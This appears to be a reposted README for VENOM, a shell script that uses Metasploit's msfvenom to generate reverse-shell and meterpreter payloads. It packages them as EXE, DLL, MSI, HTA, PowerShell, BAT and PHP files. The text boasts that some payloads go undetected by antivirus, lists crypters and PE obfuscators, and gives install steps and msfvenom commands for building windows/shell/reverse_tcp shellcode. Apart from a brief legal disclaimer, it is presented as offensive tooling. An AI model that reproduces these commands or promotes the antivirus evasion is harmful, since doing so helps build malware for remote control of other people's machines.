
VENOM 1.0.12 Codename: Black Mamba – metasploit Shellcode generator/compiller.
[ DISCLAMER ]
The author does not hold any responsibility for the bad use of this tool, remember that attacking targets without prior consent is illegal and punished by law.
The script will use msfvenom (metasploit) to generate shellcode in diferent formats ( c | python | ruby | dll | msi | hta-psh ), injects the shellcode generated into one funtion (example: python) “the python funtion will execute the shellcode in ram” and uses compilers like: gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file, also starts a multi-handler to recibe the remote connection (reverse shell or meterpreter session).
—
‘shellcode generator’ tool reproduces some of the technics used by Veil-Evasion framework, unicorn.py, powersploit, etc,etc,etc..”P.S. some payloads are undetectable by AV soluctions yes!!!” one of the reazons for that its the use of a funtion to execute the 2º stage of shell/meterpreter directly into targets ram.
DEPENDENCIES :
— “crisp.sh will download/install all dependencies as they are needed”
— Zenity | Metasploit | GCC (compiler) | Pyinstaller (python-to-exe module)
— python-pip (pyinstaller downloader) | mingw32 (compile .EXE executables)
— pyherion.py (crypter) | PEScrambler.exe (PE obfuscator/scrambler.)
Features
option – build – target – format – output
—
1 – shellcode – unix – C – C
2 – shellcode – windows – C – DLL
3 – shellcode – windows – DLL – DLL
4 – shellcode – windows – C – PYTHON/EXE
5 – shellcode – windows – C – EXE
6 – shellcode – windows – MSIEXEC – MSI
7 – shellcode – windows – C – RUBY
8 – shellcode – windows – HTA-PSH – HTA
9 – shellcode – windows – PSH-CMD – PS1
10 – shellcode – windows – PSH-CMD – BAT
11 – shellcode – webserver – PHP – PHP
12 – shellcode – multi OS – PYTHON(b64) – PYTHON
—
F – FAQ (frequent ask questions)
E – exit shellcode generator
Usage:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
git clone https://github.com/r00t-3xp10it/venom && cd venom cd aux ./setup.sh cd .. ./venom.sh Updates: git pull origin master [ HOW DOES MSFVENOM ACTUALLY BUILDS SHELLCODE? ] The default way to generate a windows binarie payload (.exe) using msfvenom its achieved through -f flag (Output format) msfvenom -p payload-name LHOST=127.0.0.1 LPORT=666 -f exe -o payload.exe But msfvenom allow us to build shellcode in diferent formats like: asp, aspx, aspx-exe, dll, elf, exe, exe-small, hta-psh macho, osx-app, psh, vba, vba-exe, vba-psh, vbs, bash, c java, perl, powershell, python, ruby, sh, vbscript. The complete list can be accessed using the follow command: sudo msfvenom --help-formats now lets generate a simple shellcode to windows/shell/reverse_tcp chosing powershell as output format "note that we will not use the flag -o (Save the payload) option, this way the shellcode generated will only displays in current terminal windows". Using powershell as output format: msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f powershell Using java as output format: msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f java Using hex as output format: msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f hex |
our post before |
Source : https://github.com/r00t-3xp10it